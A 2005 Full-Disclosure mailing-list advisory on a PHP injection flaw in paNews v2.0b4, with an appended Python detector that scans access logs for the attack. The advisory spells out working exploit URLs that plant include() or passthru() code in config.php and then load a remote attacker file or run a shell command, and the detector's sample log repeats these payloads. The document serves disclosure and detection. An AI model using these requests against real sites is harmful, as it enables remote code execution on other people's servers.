[Full-Disclosure] paNews v2.0b4 - PHP Injection
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] paNews v2.0b4 - PHP Injection
- From: tjomka <tjomka@xxxxxxxxxxxx>
- Date: Mon, 21 Feb 2005 07:16:47 +0200
oooo oooo oooooooo8 ooooooooooo
8888o 88 888 88 888 88
88 888o88 888oooooo 888
88 8888 888 888
o88o 88 o88oooo888 o888o
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: nst
* Date: 20.02.2005
********************************
web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4
PHP Injection
Bug works only if:
1. register_globals=On
2. folder "includes" is writable
p.s. please disable - javascripts =-]
Example 1
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)
then:
http://victim/panews/includes/config.php?nst=http://your/file.php
Example 2
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)
then:
http://victim/panews/includes/config.php?nst=id
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
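
Detection logic for the two request stages shown in this advisory, as an added example that is not part of the original post: it scans web-server access logs for settings updates to `includes/admin_setup.php` that carry a client-supplied `access[]` parameter and code-like values, and for requests that pass parameters to `includes/config.php`. The log lines, client addresses and finding labels are constructed, and treating any query string on `config.php` as suspicious is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format, shortened).
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2005:07:20:01 +0200] "GET /panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&showcopy=passthru($nst) HTTP/1.1" 200 512
203.0.113.5 - - [21/Feb/2005:07:20:09 +0200] "GET /panews/includes/config.php?nst=id HTTP/1.1" 200 64
198.51.100.7 - - [21/Feb/2005:07:21:30 +0200] "GET /panews/index.php?do=news HTTP/1.1" 200 4096
198.51.100.9 - - [21/Feb/2005:07:22:02 +0200] "GET /panews/includes/admin_setup.php?access%5B%5D=admins&do=updatesets&showcopy=include%28%24nst%29 HTTP/1.1" 200 512
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A settings value containing a PHP variable or a call is code, not a setting.
CODE_RE = re.compile(r'\$[A-Za-z_]|\b[A-Za-z_]+\s*\(')

def classify(line):
    """Return (client, finding) for one log line, or None if unremarkable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)  # percent-decodes
    names = {k for k, _ in params}
    if url.path.endswith("/includes/admin_setup.php"):
        # access[] arriving in the query string matches the advisory's
        # register_globals condition: the client is supplying the variable.
        forged = "access[]" in names
        code = any(CODE_RE.search(v) for _, v in params)
        if forged and code:
            return client, "config-write"
        if forged:
            return client, "forged-access"
    # Assumption: a configuration file has no reason to receive parameters.
    if url.path.endswith("/includes/config.php") and params:
        return client, "config-param"
    return None

def scan(log_text):
    """Collect findings per client, in log order."""
    findings = {}
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            findings.setdefault(hit[0], []).append(hit[1])
    return findings
```

A client showing `config-write` followed by `config-param` matches the full sequence in the advisory; `config-write` alone means the settings file should be inspected for injected code.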